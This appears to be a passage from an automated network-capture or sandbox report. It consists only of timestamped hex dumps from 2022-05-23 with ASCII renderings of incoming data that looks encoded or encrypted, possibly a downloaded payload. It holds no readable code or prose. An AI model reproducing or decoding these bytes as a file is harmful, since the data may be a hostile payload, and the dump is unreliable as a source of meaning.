3d 1d 2b 8c 8c ac 8c 8c 04 74 ac 9c 24 4c 04 04 24
                                                                                                                                                                                    Data Ascii: :`,H%1777kQ2E=CL{XLK|d >X[Dx-@7d- {clK$CAOT jphP`DXsp1%c4c0=%X@sXonQ$`C``TUh"H:aXP=+t$L$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC800INData Raw: d8 c8 ad b8 cb 2d b0 c3 09 98 88 10 c9 81 c8 c7 5e 85 10 5d 49 05 78 3e 25 97 60 97 15 b4 00 60 80 60 cd 05 a4 d2 0d 15 a7 b8 73 b5 58 88 f5 20 17 bf cd 2d e4 a8 6d d4 60 50 63 c5 c0 23 8e 43 a5 28 03 09 60 f8 15 77 08 e7 48 70 00 08 d8 68 04 50 08 78 ad 14 50 00 c2 e9 52 60 5b 84 e4 c3 ac 70 cb b4 45 fd c4 00 00 a2 bf 37 17 4b 2c dc d0 fb 9e 10 57 32 60 50 db 3d f0 eb c9 50 a8 fc 11 80 80 96 15 1e f9 73 05 90 5b 82 d8 12 cd 25 b6 10 43 f5 68 b8 2d df 37 37 65 85 4c 30 bd 1c 50 f8 eb 25 68 0e db 95 5d a2 8c 60 8c 9c ac d5 0b bc d3 04 f4 ae d9 2d 24 cb a5 bc c3 a1 44 a8 63 48 60 50 e7 36 08 4d 28 bc c7 5b 6c 60 db 0c eb 2d 68 01 b8 c6 76 9f 7f e3 84 54 eb 90 d2 db 9e 00 b1 aa 50 60 53 05 14 cb 48 88 7f 31 c8 b8 eb 1d 14 0b c9 21 cb c9 e8 d8 0b 3d ac 7b a1
                                                                                                                                                                                    Data Ascii: -^]Ix>%```sX -m`Pc#C(`wHphPxPR`[pE7K,W2`P=Ps[%Ch-77eL0P%h]`-$DcH`P6M([l`-hvTP`SH1!={
                                                                                                                                                                                    2022-05-23 16:54:51 UTC816INData Raw: 98 33 ed b4 13 7f 37 99 63 5d c8 25 7f 8f 02 92 05 ed e5 ac a9 8f ff 30 68 42 c6 af 9f 03 44 44 d9 6d ec 05 af 9f 53 cd b0 bd bf 9f c3 81 f8 31 ed 4c 15 7f 37 45 7d 84 16 27 7f 22 db 75 7c 9d 9f af b8 28 c5 60 80 e9 c5 40 9d 7f 7f db d5 b0 05 07 af e3 18 70 61 c5 58 9d bf bf 45 35 fc aa 17 7f 99 43 65 d0 15 27 7f 98 e1 3c 60 60 eb 98 b8 4a 37 60 80 e9 c5 5c 9d 7f 7f db c5 fc 05 07 af 32 53 c5 f8 bd bf 9f 10 cb 45 b4 9d af 17 d1 43 85 e0 20 cf 3c 7f 8f d8 7d 54 9d 9f af dd fd 4c 9e 7f 9f a8 36 4c 80 80 dd dd 14 01 07 af 88 b3 70 e8 40 cd ed 74 be 37 47 88 00 c4 80 c8 45 a5 54 00 90 ac 70 50 75 ed f4 9b af af 98 0d 4c 80 60 cd dd 24 7d 7f af b8 7a d7 f8 50 ea 5d 74 15 bf bf 89 fa 48 c8 b8 0a 50 65 0d 4c 33 17 37 00 e2 92 70 50 71 e5 64 9d af af 18 68 7a c4
                                                                                                                                                                                    Data Ascii: 37c]%0hBDDmS1L7E}'"u|(`@paXE5Ce'<``J7`\2SEC <}TL6Lp@t7GETpPuL`$}zP]tHPeL37pPqdhz
                                                                                                                                                                                    2022-05-23 16:54:51 UTC832INData Raw: f4 99 63 8d 88 73 05 ec 32 88 c1 66 50 70 83 a4 8c eb 05 40 4b c5 98 7b 15 fc 7b 38 51 30 53 0d e4 43 0d 74 43 0d d0 e9 eb 05 e0 83 9d dc eb 9d c8 8a 68 08 66 f8 60 e3 a4 5c db 95 5d a2 9c 60 8c 9c ac 4c 4c 9c 9c 24 34 34 9c ac 14 8c 24 15 cb 8c c3 ac c0 31 2d a8 63 c5 d8 98 63 85 e4 89 0b 25 58 aa 88 26 56 50 50 f3 c4 6c 0b 25 58 00 eb cd 94 01 db bd f0 fb 05 70 8a a8 c7 76 40 60 c3 84 c4 7e 25 af e8 0d 8d 37 b8 43 a5 c8 83 3d 48 fb 2d 68 31 b8 65 5e 00 60 03 a4 48 db 85 dd 42 44 50 24 34 34 9c ac 14 8c 24 8c 8c ac 8c 15 43 54 e3 bc e0 09 85 30 63 8d f8 88 0b 3d 5c a9 eb 35 68 02 b8 96 35 60 80 e3 84 5c 6f 36 c5 48 00 63 b5 ec 01 eb 8d 48 eb 15 50 32 a8 8e e5 b8 60 d3 2c 8c 0e 8d 17 c8 65 9d 7f 20 db b5 70 63 2d 44 53 3d 08 31 68 b4 6d 50 60 03 44 58 db
                                                                                                                                                                                    Data Ascii: cs2fPp@K{{8Q0SCtChf`\]`LL$44$1-cc%X&VPPl%Xpv@`~%7C=H-h1e^`HBDP$44$CT0c=\5h5`\o6HcHP2`,e pc-DS=1hmP`DX
                                                                                                                                                                                    2022-05-23 16:54:51 UTC848INData Raw: e5 e0 9e af af b5 fe 0f 05 e0 be af 9f 0b 15 0c af 17 07 7b 92 40 1d be 97 42 73 a0 34 42 23 f7 a5 ad 87 c5 68 0d 16 b7 6d 98 7e 8f af 73 ed 3c 9f af af f3 c1 20 45 9e 2f 51 a5 7e ff d5 30 16 07 07 95 9e b7 c5 88 be bf 9f 85 bd 27 3d 20 ae 17 7f 0d 36 97 4d c8 26 7f 8f 95 06 0f e5 40 ae af 8f 8b f5 dc 9f bf af e3 42 c0 95 ae 97 fa 40 51 60 d8 40 6d 80 34 62 ab 0f 0d 45 0f 15 28 45 36 b7 6d 28 15 27 7f fb dd a4 9f 9f 9f d3 91 10 c5 9e ef 61 85 ae 1f 05 80 ae af 17 3d 06 3f e5 d8 be 17 bf 85 9d af c5 28 45 9f af 2d 7e b7 4d 28 35 17 27 45 8e 3f 7d a0 9d 9f af db e5 5c 9f 7f 9f c3 92 00 45 7e 2f 52 50 f9 f8 50 60 5d 80 9c 42 ab 35 85 bd a7 fd 80 95 16 ff 4d 48 15 37 17 53 0d 2c af 07 9f e1 a1 d0 50 70 00 a5 7e 0f 41 95 9e ff 05 f0 ad 17 07 3d ae 0f 5d e0 15
                                                                                                                                                                                    Data Ascii: {@Bs4B#hm~s< E/Q~0'= 6M&@B@Q`@m4bE(E6m('a=?(E-~M(5'E?}\E~/RPP`]B5MH7S,Pp~A=]
                                                                                                                                                                                    2022-05-23 16:54:51 UTC864INData Raw: 0b 35 b8 d9 2a 98 0b 15 a8 e7 4e b0 40 e5 11 34 e1 cb 15 98 86 02 d8 b8 8b 5e 63 cd 30 20 15 c9 e8 d8 0b 3d a8 71 21 6c 88 72 a7 8f ff eb d5 98 79 12 6c f4 a7 db 15 10 7b 38 70 e9 9d b4 63 0d b8 e3 81 4c 99 50 d5 17 e8 80 4b 0c ec 40 ad 27 0d 25 af aa eb 2d 94 b8 13 53 00 60 0b 25 b8 d3 18 8c 8a 25 49 63 b5 00 db 31 c4 c3 2a 41 cb 25 b8 c9 98 a4 eb 1d 10 47 89 d0 e8 c8 e8 d8 0b 25 a8 73 22 6c eb b5 0d b3 cc ac 4c ac 8c 9c ac d5 0b bc d3 04 d4 59 f4 01 94 40 db 85 c9 25 bc 87 8d 60 b4 ae 17 7f 0f 8d 3c c0 e8 d8 80 f1 2d f4 44 9a 9f af 2d 67 68 24 bc 60 40 38 38 88 c4 50 38 40 f6 bc 50 88 14 50 e9 40 c3 a4 4c c1 b5 b4 bc 55 e8 80 b6 df 80 8d d4 d8 80 18 08 f0 24 60 08 90 5e 34 00 88 2c 70 41 50 e3 44 8c ea 94 17 07 07 7b 35 d4 c3 02 41 c9 35 a4 c3 b5 5c 60
                                                                                                                                                                                    Data Ascii: 5*N@4^c0 =q!lryl{8pcLPK@'%-S`%%Ic1*A%G%s"lLY@%`<-D-gh$`@88P8@PP@LU$`^4,pAPD{5A5\`
                                                                                                                                                                                    2022-05-23 16:54:51 UTC880INData Raw: db 04 7b 14 48 e9 95 bc 63 05 bc e3 78 40 bd af 08 69 c5 80 c8 a0 b0 c0 ac d8 e8 74 7c bc 60 88 12 81 50 70 83 a4 8c eb 15 ac eb 82 8f e6 58 61 b5 00 d3 1d 20 49 9f 19 cb 35 b8 bf ec 2d 84 10 aa 80 43 8d 14 43 e0 53 d1 78 d9 ad 94 ed 25 bc 00 fb 4d 94 68 e6 30 af 9f 0b 88 db 05 14 71 b2 54 8b e1 cb ad bc cb 68 cb 11 c0 31 35 a0 65 c5 20 98 63 85 18 30 a5 02 af 07 eb 68 eb 05 ac f9 4a 68 6b 78 cb 1d 9c 03 41 5c b8 c8 f9 f8 50 8b d3 cb a5 bc c3 a1 4c a8 fb b8 60 50 63 65 95 0b e7 d7 e8 1d c0 32 50 7b 20 22 60 f4 10 32 00 b2 c0 22 40 82 20 c2 80 82 10 aa f8 2a 10 22 d8 92 a8 02 40 b2 00 02 c8 6a 20 12 e8 4c 04 04 24 9d 63 34 d1 f9 1d 04 eb 25 9c 97 50 70 00 60 80 eb a5 0d a3 4c 4c 9c 9c 24 34 34 9c ac 14 8c 24 15 cb 8c c3 ac d0 31 2d ac 63 c5 34 4b d0 c8 9d
                                                                                                                                                                                    Data Ascii: {Hcx@it|`PpXa I5-CCSx%Mh0qTh15e c0hJhkxA\PL`Pce2P{ "`2"@ *"@j L$c4%Pp`LL$44$1-c4K
                                                                                                                                                                                    2022-05-23 16:54:51 UTC896INData Raw: 9c 49 c1 18 54 62 cd 2b 79 25 bd 0b 80 d4 6d 01 9c 96 0b 21 54 7d b2 14 49 d3 35 8c 00 32 7f 10 58 b8 2a 80 80 50 97 ad 04 06 af 9f 27 ab d9 bf 35 6c bf 35 24 50 23 50 e8 80 91 91 2b 43 8d 30 6b 94 a6 f9 70 14 79 db 10 68 8b 68 05 a9 34 40 eb 81 d1 db 20 e0 73 36 af 75 90 41 ac 40 bf b6 cb 0d 38 dc e9 5d e8 80 c8 c8 b1 97 b6 83 49 b3 05 73 8c eb 2d 58 af 25 0c 3d 42 68 40 05 eb 6c 00 2d 5c e8 8c ca 06 37 53 3d e0 cb 77 e1 7e 23 bb d5 80 25 c9 03 b6 d8 eb bd f3 59 fe 64 70 fd f3 79 14 48 d1 0e 14 41 85 f3 59 24 6f 01 fe 44 72 ed 6b e1 24 66 87 1e db 80 1d a3 a8 a3 c8 b8 60 d9 98 90 43 bf ec 20 30 d8 80 70 d9 88 74 88 19 f1 50 70 cc 35 0b 8c a8 97 60 80 80 db 10 cc 7d 38 24 6e 53 0d e0 79 48 14 4c cb 88 bc e5 90 9d 75 fb 08 a8 95 2b eb 40 2d 93 ad eb 8c eb
                                                                                                                                                                                    Data Ascii: ITb+y%m!T}I52X*P'5l5$P#P+C0kpyhh4@ s6uA@8]Is-X%=Bh@l-\7S=w~#%YdpyHAY$oDrk$f`C 0ptPp5`}8$nSyHLu+@-
                                                                                                                                                                                    2022-05-23 16:54:51 UTC912INData Raw: ec aa 17 7f 4d 13 e7 4c 0d d8 80 70 d3 c4 de 60 15 4e 6b 88 0f e5 4e 60 40 50 e3 24 3d c0 aa 17 07 f8 dd 27 d9 c9 6d cc ba 9f bf a9 70 b8 60 50 db 52 fb 13 61 5d 20 2e 7f 8f db 0f e5 a9 6f d4 df 70 00 60 03 9e 33 24 32 bb 70 25 43 6b 5c 4d c0 9a 27 bf e8 cd 07 61 43 82 41 3d ec aa 17 7f 43 4d 3c 3e 17 27 0b 74 c0 73 f5 bc 96 af af 87 24 da 83 a3 c3 82 60 81 04 e5 c0 12 07 07 db e5 54 ba 17 bf c3 b2 40 cb 12 33 f5 98 1e 7f 37 8a ae 41 7d 10 76 8f af c3 b1 15 c9 d5 8b 04 34 e3 7e 13 4f d4 64 81 80 50 6b 18 8d e9 d3 c4 6d d0 12 bf bf 60 cd 06 c9 31 e5 dc 12 7f 37 43 2b fb 33 d9 04 c5 c0 02 9f 9f eb d5 dc 8a ff 9f 93 bb 06 bb a8 03 7e 23 5f 6c 28 f8 50 60 53 dd 24 b6 bf 9f cb f5 14 4e 9f af af bb 33 c7 6d d3 17 27 7f f9 d5 44 98 9f 9f 91 b0 72 50 ed 05 f0 ba
                                                                                                                                                                                    Data Ascii: MLp`NkN`@P$='mp`PRa] .op`3$2p%Ck\M'aCA=CM<>'ts$`T@37A}v4~OdPkm`17C+3~#_l(P`S$N3m'DrP
                                                                                                                                                                                    2022-05-23 16:54:51 UTC928INData Raw: 63 17 0b 36 58 a8 eb 60 9f 20 54 fd 45 9c d0 31 a8 f6 22 80 80 d3 94 f8 7d 38 29 75 1e 06 d8 41 ab 6f cb c7 cc bc 60 50 6d 40 bd ca 63 0f 8e 51 98 fb d7 fc 64 60 60 d5 90 04 02 eb 78 e9 3e 64 d0 81 df 97 16 d0 f9 f8 50 60 86 1b 21 82 44 60 cb bf 9d 33 8c 01 bb d6 43 39 bf 37 9e f4 68 8c aa 07 9f 39 eb 98 d9 35 fc e3 69 61 34 28 e3 69 81 24 06 a1 7b 11 51 14 eb c3 01 44 34 77 a8 85 5e 47 9f 97 e8 96 c8 c8 e8 20 08 4d 7f 8f 62 38 89 65 61 50 50 fb 46 40 03 26 54 58 a1 68 84 f8 51 63 be ec db 18 20 cb b0 bc ab 3a cb 06 e8 3b 26 44 ec 41 20 cc 40 c9 63 9e 94 04 55 73 20 9c 8b 6f db 08 fc 53 5b 8b 7d db 26 a0 03 16 44 ec 39 10 54 c8 d9 cb ae 54 34 66 4f ff 88 44 8b 71 e7 37 88 34 03 d3 63 9e a0 f3 16 ec 64 a1 88 54 f8 71 8b 26 94 14 46 5f de c0 7c bb 54 e7 4e
                                                                                                                                                                                    Data Ascii: c6X` TE1"}8)uAo`Pm@cQd``x>dP`!D`3C97h95ia4(i${QD4w^G Mb8eaPPF@&TXhQc :;&DA @cUs oS[}&D9TT4fODq74cdTq&F_|TN
                                                                                                                                                                                    2022-05-23 16:54:51 UTC944INData Raw: ec 52 50 70 eb 4e d6 88 24 52 60 80 6b 76 dd ad 07 a8 06 88 d8 42 e8 40 ab d2 cd 05 37 e8 36 b8 3a 81 c8 c8 03 6e be 30 2a 71 50 f8 8b 66 36 b8 d3 71 00 60 d9 ea 88 63 a0 04 49 5f c5 28 fb 00 d4 a9 d7 c5 f4 bf bf 9f c4 bf bc b9 27 d0 d7 a0 bc 32 6c 37 9d c9 b8 4f 5f 7d c4 60 60 50 96 36 08 61 69 cb 40 50 60 ea 83 38 1c 89 bc f8 07 88 a3 a2 17 bf c3 a4 4c c5 08 b7 e5 d3 e8 80 c8 a2 c8 4b 2f db d9 9b 51 bf ea 67 5a 91 24 89 3c 5d f5 10 07 68 6f f4 7b 3a 55 b3 ab 90 00 01 9c 40 bf a8 f6 33 40 40 4b 7c 6c d5 28 f5 c0 49 e6 c8 e8 dc 80 9b 6a 92 68 3b 33 38 08 11 44 60 d7 88 d8 03 60 80 03 94 5c 6d 38 8d 58 e1 d6 40 e8 42 40 8b 5c 2a cf e3 33 38 88 e1 8c c8 bf 20 92 8b 80 70 d3 3c 6c e5 a0 25 49 f1 0e 60 80 61 40 dd 6c 9f 6b 51 11 62 f9 c4 70 14 21 c4 28 a9 16
                                                                                                                                                                                    Data Ascii: RPpN$R`kvB@76:n0*qPf6q`cI_('2l7O_}``P6ai@P`8LK/QgZ$<]ho{:U@3@@K|l(Ijh;38D``\m8X@B@\*38 p<l%I`a@lkQbp!(
                                                                                                                                                                                    2022-05-23 16:54:51 UTC960INData Raw: 43 a0 9f 89 0b d8 dc e8 f8 f8 d5 a9 ac 43 18 bf 49 36 2a 46 45 f0 48 0e 69 f9 30 e0 8b 84 e8 ac 89 fb 41 7d b2 14 63 a0 af 7a 83 19 74 60 34 5a eb d1 7c d5 82 9c fb 08 af 6a 5b 81 f8 c3 ae 61 35 96 37 08 fc 50 e8 80 20 92 17 37 17 81 de 2d 93 92 6c 08 b0 f5 14 70 e8 02 58 9e bf d3 05 64 80 b8 29 4e 07 07 dd 18 94 cb e5 70 29 2c 40 c5 40 e8 63 50 e8 f4 ce 43 df 4d 1e ad bd 1a 54 10 5c c9 9f af 09 f3 65 9c 80 9f 75 34 14 cc 80 07 b8 d5 f8 f8 50 39 81 cb 18 c9 35 84 87 05 34 46 9f af 17 68 c1 c8 e8 c8 6d 2e f4 50 bb f4 eb 15 84 3a 54 98 50 c9 7f 9f 19 93 eb 46 0b 1d a0 8c 71 f5 50 60 d8 40 b1 1f 1e 3b 89 83 20 81 7a af 17 4c 43 37 bd 43 04 8e 0b 05 5c af e5 96 14 6c db 35 08 e5 40 14 75 db 58 bb 7e 25 54 63 3e 13 7d 36 51 70 00 cf bc 9f bf 19 4d 47 14 bf bf
                                                                                                                                                                                    Data Ascii: CCI6*FEHi0A}czt`4Z|j[a57P 7-lpXd)Np),@@cPCMT\eu4P954Fhm.P:TPFqP`@; zLC7C\l5@uX~%Tc>}6QpMG
                                                                                                                                                                                    2022-05-23 16:54:51 UTC976INData Raw: 73 65 a8 9e 27 bf 03 47 cd c4 64 40 c8 b8 60 7b 20 09 45 cc 17 37 17 e3 4f 06 71 af 31 eb ab af 45 38 01 24 80 9f 93 db ed 84 7f af af 6b 3c f0 d5 a0 53 c5 e8 bf bf 9f 34 95 23 fc eb cd 10 7e 37 37 63 7d 14 26 7f 8f dd 5c 44 60 60 50 50 5b c8 e9 0d 64 bf af 9f bb 4e 26 4f bf a9 73 9b 9f cd 08 e9 04 40 9f 93 cb 45 bc 9f af 17 03 0c c0 6d 08 63 5d 80 8f af 07 14 b5 eb e5 a4 8e ff 9f 0b f5 48 af 9f 7f 0b 9a db 55 fc 07 af 9f f3 8e 63 87 6b e5 bc be 37 47 5b 91 94 bd 43 4d 14 36 17 27 bb b7 23 e0 eb ed 88 ae af 8f 89 24 0d e4 c9 ec ed 8c 7f af af a9 71 75 b8 9e 27 bf 63 cd 48 9f bf bf 43 05 60 af 17 7f f3 39 9b 8c 61 6d 7c 8e af 07 89 98 9b af af 4b f2 13 98 eb c5 b8 9e 7f 7f d9 24 6d 7c 71 c4 e5 d4 bf 17 bf 00 e9 c5 a8 36 47 9f db 5d 7c 36 37 17 f3 1f ab 8d
                                                                                                                                                                                    Data Ascii: se'Gd@`{ E7Oq1E8$k<S4#~77c}&\D``PP[dN&Os@Emc]HUck7G[CM6'#$qu'cHC`9am|K$m|q6G]|67
                                                                                                                                                                                    2022-05-23 16:54:51 UTC992INData Raw: 40 05 40 32 c8 cb 60 0c e8 f2 c8 a7 e8 a7 e8 ac 80 2c 50 bc 60 05 60 23 50 1b 00 14 80 0f 40 20 60 dc 80 32 50 87 f8 8c 50 40 d8 36 e8 72 40 3c 40 2a c8 cb 60 3f e8 ee c8 e6 e8 a0 e8 a8 80 00 50 f8 60 6a 60 50 50 33 00 5a 80 3c 40 05 60 f3 80 35 50 9a f8 8b 50 3c d8 32 e8 2f 40 0f 40 34 c8 e4 60 14 e8 e5 c8 bb e8 a3 e8 ac 80 1f 50 88 60 3c 60 32 50 1f 00 14 80 40 40 26 60 b2 80 0c 50 82 f8 8b 50 0f d8 2e e8 6e 40 08 40 30 c8 c8 60 50 e8 8a c8 c8 e8 ed da e8 80 50 50 f8 60 45 50 11 50 7a 00 60 80 4f 40 50 60 fe b1 50 50 96 f8 f8 50 1e e8 40 e8 03 40 5a 40 1c c8 ed 60 23 e8 e5 c8 ba e8 bb e8 84 80 02 50 97 60 0f 60 24 50 2c 00 24 80 05 40 23 60 eb 80 24 50 87 f8 88 50 3c d8 22 e8 2f 40 14 40 60 c8 ce 60 62 e8 dc c8 a2 e8 bb e8 b7 80 1e 50 d6 60 08 60 20 50
                                                                                                                                                                                    Data Ascii: @@2`,P``#P@ `2PP@6r@<@*`?P`j`PP3Z<@`5PP<2/@@4`P`<`2P@@&`PP.n@@0`PPP`EPPz`O@P`PPP@@Z@`#P``$P,$@#`$PP<"/@@``bP`` P
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1008INData Raw: e8 80 c8 e9 e8 97 e8 b1 80 03 50 a7 60 04 60 3f 50 05 00 02 80 0c 40 35 60 80 80 19 1e ae f8 91 3e 06 d8 09 a6 09 14 39 40 40 c8 d1 0e 39 9c f9 c8 c8 e8 86 a9 96 80 1e 31 96 60 33 2e 11 1e 59 00 60 80 13 2e 31 0e a9 80 50 50 a1 b6 bc 79 09 b6 24 c1 40 40 60 40 40 c8 b8 60 56 e8 80 c8 c8 e8 c8 e8 d8 80 70 50 f8 60 60 60 50 50 70 00 60 80 60 40 56 60 80 80 50 50 e8 f8 f8 50 60 d8 40 e8 40 40 61 40 40 c8 b8 60 50 e8 80 c8 c8 e8 c8 e8 d8 80 70 50 f8 60 61 60 50 50 70 00 60 80 60 40 50 60 80 80 50 50 e8 f8 f8 50 63 d8 40 e8 40 40 60 40 46 c8 b8 60 50 e8 80 c8 c8 e8 c8 e8 d8 80 70 50 fe 60 60 60 50 50 70 00 62 80 60 40 51 60 80 80 50 50 e8 f8 f8 50 60 d8 44 e8 40 40 64 40 40 c8 bd 60 50 e8 84 c8 c8 e8 cd e8 d8 80 74 50 f8 60 65 60 50 50 70 00 60 80 65 40 50 60
                                                                                                                                                                                    Data Ascii: P``?P@5`>9@@91`3.Y`.1PPy$@@`@@`VpP```PPp``@V`PPP`@@@a@@`PpP`a`PPp``@P`PPPc@@@`@F`PpP```PPpb`@Q`PPP`D@@d@@`PtP`e`PPp`e@P`
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1024INData Raw: 40 15 ad e3 75 d3 5f c5 37 fc 04 e0 62 57 7d 50 00 45 00 77 c3 5c c7 0b f5 02 15 ec 2c 6f 7d 60 c0 a9 96 cb 65 e6 d7 1f b5 69 cb 07 2b cf bd 70 f0 b2 ed 17 0b e7 6f 0a 6e c0 92 88 43 4c 5d 80 40 b4 1e e3 2e 40 6f e2 94 0e 24 a5 40 59 7d 40 88 9c 42 e4 db 3a f7 fd bf af dc a8 71 46 6d f8 e0 c7 34 e6 c5 cb 3f a7 ce 16 64 0e 6e a9 bd 50 b0 01 fa de ba dc e7 8b 23 6e c2 49 91 ab f4 b8 c0 3c 29 34 8a 76 d7 21 a5 55 73 7f b5 dd 5d 60 00 3a e1 75 8d df bf c7 37 e7 c2 25 0e 7a 6d e8 d8 c4 95 fb b5 80 d7 05 ba 81 ae cd 49 8a 5d 50 e8 5e 64 f6 e5 09 d7 76 70 f3 9b bd ea 7e 5d 50 80 04 15 5f 38 a1 7f 84 9f 13 71 49 5b e9 c5 f8 80 2f dd be b9 82 7f a0 37 68 88 b1 cc ae d4 80 28 3c f4 f8 1f 1a bf 31 33 e2 6d a7 95 60 6d 70 50 19 8f 10 d4 93 5f e4 f2 4a 29 d7 11 e7 6d
                                                                                                                                                                                    Data Ascii: @u_7bW}PEw\,o}`ei+ponCL]@.@o$@Y}@B:qFm4?dnP#nI<)4v!Us]`:u7%zmI]P^dvp~]P_8qI[/7h(<13m`mpP_J)m
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1040INData Raw: 3c 32 d4 25 45 40 93 1b f0 fd b1 d6 8e ca 30 31 14 f6 5f b5 5c 8e 56 32 a9 57 b1 02 b3 15 b0 15 5d 98 ad 1c a9 4d 1f e3 de ed b9 8a e3 91 45 cc ed c3 4c e7 88 a4 fb 52 5f 8d cf 69 c0 8f b6 77 94 c2 f6 f4 ab 75 76 04 1a fd 32 1a 6b 98 a0 1d ab e9 1f c8 ac a5 6e b2 0c c9 70 99 99 5b d2 9d da da 0a 28 e9 1c 48 d1 6e b3 31 e1 01 ae 4b c9 39 b3 48 d4 5f 57 54 0d ae 48 14 1c 49 8a cf a4 26 c8 34 be 53 39 79 73 dd e0 82 8d 42 da cb 6a c9 cc a8 a2 50 86 1d c8 ba 2e 32 e9 44 bb f3 b2 50 69 9d 4d 06 23 e9 cc df 5c 8a ee 2e 54 15 9d cb b1 49 f0 dc 8d 04 83 47 78 ce f3 8a 04 df ec f6 5f cb 8f e2 6f e0 be 84 25 04 43 bd 86 dc 3d 55 ef 41 24 2d 59 27 0d 4b 67 9d 35 a9 18 97 77 66 56 3a 1b fc e5 d6 68 51 b4 cd 69 8e d5 ef 97 f3 d2 4e 5c a3 ec 66 24 0a 01 f0 02 86 7f c8
                                                                                                                                                                                    Data Ascii: <2%E@01_\V2W]MELR_iwuv2knp[(Hn1K9H_WTHI&4S9ysBjP.2DPiM#\.TIGx_o%C=UA$-Y'Kg5wfV:hQiN\f$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1056INData Raw: 93 92 0b 24 ad af 2e 81 84 25 04 fb e2 86 dc 6d 8b d3 41 24 21 dc 73 92 4b 7c 15 8b 3e b9 54 31 dc bb 43 a2 fc e5 9e 6a cc 1c c1 ec 1f 83 2d 1d 7d a5 01 15 68 78 12 13 ab 68 7e f5 8e bb 42 91 e8 39 50 82 5e f4 9c 0c 7b 41 3c 9b 04 23 83 b5 b5 8d 46 17 d3 ec c8 e1 b0 b6 6e 84 5e 07 73 31 0b 2a 31 43 83 2d 09 1d 6e 58 80 94 60 33 79 23 a6 84 d6 03 b3 09 ff 49 69 8b b6 bc cc 4d e6 78 a4 24 d0 32 f2 ab ae 5c ff 9e f3 41 97 d5 71 1b e8 77 b4 3d 85 d9 61 dc c0 22 b6 33 46 af 5c 1e 7b 09 54 e8 a2 79 73 1e 54 4e d3 83 a1 77 21 59 e8 eb c6 14 46 a4 d3 d9 b0 c5 04 cb 87 a3 21 bd d6 7e 04 f4 68 04 b6 e3 6e 0a 80 89 0c 95 f9 05 e1 3f fe 4b 8c 25 c3 b6 3d 2c 25 e4 c3 23 af 11 4a 51 5b 6a 18 d8 f4 f8 d7 5a 00 15 bf 37 fd f4 47 c1 d0 37 a6 b4 7e 77 13 ba 26 d0 aa b2 c3
                                                                                                                                                                                    Data Ascii: $.%mA$!sK|>T1Cj-}hxh~B9P^{A<#Fn^s1*1C-nX`3y#IiMx$2\Aqw=a"3F\{TysTNw!YF!~hn?K%=,%#JQ[jZ7G7~w&
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1072INData Raw: 60 ba 6a 23 56 50 b6 70 40 95 f6 a1 ba e2 ab 3c 25 3a 58 d1 12 0b 28 ec c6 e0 a8 a9 db cb 96 e3 03 ac 1c 5f d0 8b 21 3f 08 1e c6 15 bb 39 d8 b5 93 61 52 ae 6c b1 de 70 16 0a 01 ef b5 73 d8 42 50 5d 6e c8 e0 ed d0 b8 97 df 86 c3 6d 38 91 e9 1c e4 02 87 37 76 50 6e 22 b7 51 66 98 a9 8a 97 d1 23 0a e6 02 22 1d 7f 06 35 39 cb 60 56 6f e1 11 cd 96 e7 7e d4 d3 6f 9d 15 15 b0 17 65 00 50 1f 69 e9 ad 71 c3 d9 f1 f0 4f c4 b6 95 12 11 05 15 a5 e7 66 75 27 9d 99 6b b1 06 5b 61 54 20 50 34 5d 96 2d 5e 7e bb f2 1f b7 7f d1 93 a4 9d 6d a6 5a f6 0c d1 a2 aa 62 e3 19 24 34 0b 40 02 f6 1c 4c 26 ed b5 6e f1 5a ca 99 69 8a 97 bc 53 a0 da 36 f3 6c 3c e6 a9 86 10 60 55 5e 59 8e d2 f3 3c bc a6 f8 f3 29 ce 61 44 d6 f4 88 89 db db 89 e2 0f ef cc d7 10 11 40 db 57 3f cc 3f f6 4e
                                                                                                                                                                                    Data Ascii: `j#VPp@<%:X(_!?9aRlpsBP]nm87vPn"Qf#"59`Vo~oePiqOfu'k[aT P4]-^~mZb$4@L&nZiS6l<`U^Y<)aD@W??N
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1088INData Raw: 62 fb 13 7f fc e5 26 11 41 54 20 01 53 43 46 20 0e 36 b3 e8 fc 98 99 c9 9b a6 1c d5 8e c3 e9 cc a3 99 ab 72 3e 64 e5 ac 4b c9 74 88 89 db db 52 bf 0d ee c2 61 1c 00 03 53 53 2e 44 35 be c3 a9 17 a8 e9 ea cb b6 9c d7 4e f3 c9 cc a8 49 3b 17 7d 74 0d 37 c3 e9 44 8b 21 fb db a6 dc f5 06 cb 02 cc 60 48 73 53 2e 57 5d 16 13 f9 cc 30 a9 3f 10 96 8c c4 ce f3 09 fe 88 99 db 1b 46 cc e5 ce 80 71 8c a9 11 fb 73 84 dc d5 8e d3 41 24 a8 75 b8 1b 4e 55 5d 06 7b 53 1c b8 99 43 fb a6 fc 15 75 e3 c9 fd 48 a9 fb c2 a6 1c 35 9e c3 61 64 30 75 db 03 87 74 f5 8e fa c9 dc 00 71 db cb 2e 0c 91 06 3b 40 74 10 49 cc cb 3e fc d5 ae c3 d9 f4 24 a9 7b fa 86 cc d5 46 13 d9 cc 20 31 43 cb 8e a8 f5 66 d2 c9 fc 88 9d 73 23 a6 cc 5d 4e 5b 01 98 00 61 62 1b b6 cc 45 ae f3 e9 cc 98 b9 bb
                                                                                                                                                                                    Data Ascii: b&AT SCF 6r>dKtRaSS.D5NI;}t7D!`HsS.W]0?FqsA$uNU]{SCuH5ad0utq.;@tI>${F 1Cfs#]N[abE
